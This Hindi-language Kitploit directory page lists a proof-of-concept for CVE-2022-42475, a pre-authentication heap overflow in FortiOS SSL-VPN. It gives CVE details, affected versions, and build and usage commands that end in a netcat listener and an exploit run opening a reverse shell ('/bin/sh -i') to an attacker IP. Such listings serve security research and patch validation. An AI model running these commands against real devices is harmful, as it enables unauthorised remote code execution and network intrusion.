Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2022-42475-poc — CVE-2022-42475 के अनुसंधान और नियंत्रित प्रयोगशाला सत्यापन के लिए प्रूफ ऑफ कॉन्सेप्ट (PoC), जो FortiOS के कुछ संस्करणों में SSL-VPN सेवा को प्रभावित करने वाली एक गंभीर हीप-आधारित बफर ओवरफ्लो भेद्यता है। | Kitploit
उपकरण/GitHubGitHub/ull0a/cve-2022-42475-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगरिमोट एक्सेस टूल
GitHubull0a/cve-2022-42475-poc

cve-2022-42475-poc

CVE-2022-42475 के अनुसंधान और नियंत्रित प्रयोगशाला सत्यापन के लिए प्रूफ ऑफ कॉन्सेप्ट (PoC), जो FortiOS के कुछ संस्करणों में SSL-VPN सेवा को प्रभावित करने वाली एक गंभीर हीप-आधारित बफर ओवरफ्लो भेद्यता है।

रिपॉजिटरी देखें
16घं 29मि पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-42475 PoC

Fortinet SSL VPN प्री-ऑथेंटिकेशन रिमोट कोड निष्पादन

विवरण

CVE-2022-42475 FortiOS की SSL VPN सेवा में एक heap-based buffer overflow भेद्यता है, जो बिना प्रमाणीकरण वाले हमलावरों को /remote/error एंडपॉइंट पर लक्षित विशेष रूप से तैयार किए गए HTTP अनुरोधों के माध्यम से दूरस्थ रूप से मनमाना कोड निष्पादित करने (RCE) की अनुमति देती है।

यह भेद्यता आधिकारिक पैच प्रकाशित होने से पहले सक्रिय रूप से वास्तविक दुनिया में (0-day) शोषित की जा चुकी थी।

PoC का निष्पादन

निम्नलिखित स्क्रीनशॉट एक अधिकृत प्रयोगशाला वातावरण में PoC के निष्पादन को दर्शाता है:

आउटपुट PoC के निष्पादन और परीक्षण के लिए उपयोग की गई FortiOS इंस्टेंस के साथ इंटरैक्शन को दर्शाता है।

PoC का निष्पादन

CVE जानकारी

फ़ील्डमान
CVE IDCVE-2022-42475
CVSS 3.19.3 (गंभीर)
वेक्टरCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-122
खोजा गयादिसंबर 2022
आधिकारिक पैचFortiOS 7.2.3, 7.0.9, 6.4.11, 6.2.12, 6.0.16

प्रभावित संस्करण

  • FortiOS 7.2.0–7.2.2
  • FortiOS 7.0.0–7.0.8
  • FortiOS 6.4.0–6.4.10
  • FortiOS 6.2.0–6.2.11
  • FortiOS 6.0.0–6.0.15
  • FortiOS 5.6.0–5.6.14
  • FortiOS 5.4.0–5.4.13
  • FortiOS 5.2.0–5.2.15
  • FortiOS 5.0.0–5.0.14

आवश्यकताएँ

  • Go 1.18+ (PoC को संकलित करने के लिए)
  • लक्ष्य के पोर्ट 443 पर नेटवर्क पहुँच (या कॉन्फ़िगर किया गया SSL VPN पोर्ट)
  • परीक्षण करने के लिए अधिकृत प्रयोगशाला वातावरण

संकलन

root@kitploit:~
# स्रोत कोड को क्लोन या डाउनलोड करें
git clone https://github.com/uLl0a/cve-2022-42475-poc
cd cve-2022-42475-poc

# संकलित करें
go build -o exploit exploit.go

# या सीधे चलाएँ
go run exploit.go <target> <port> <reverse_ip> <params>

उपयोग

root@kitploit:~
./exploit <target_host> <target_port> <reverse_ip> <param1> [param2...]

उदाहरण

root@kitploit:~
# हमलावर पर, listener प्रारंभ करें
nc -lvnp 80

# एक्सप्लॉइट निष्पादित करें
./exploit 192.168.1.100 443 10.0.0.5 /bin/sh -i
टूल डाउनलोड करें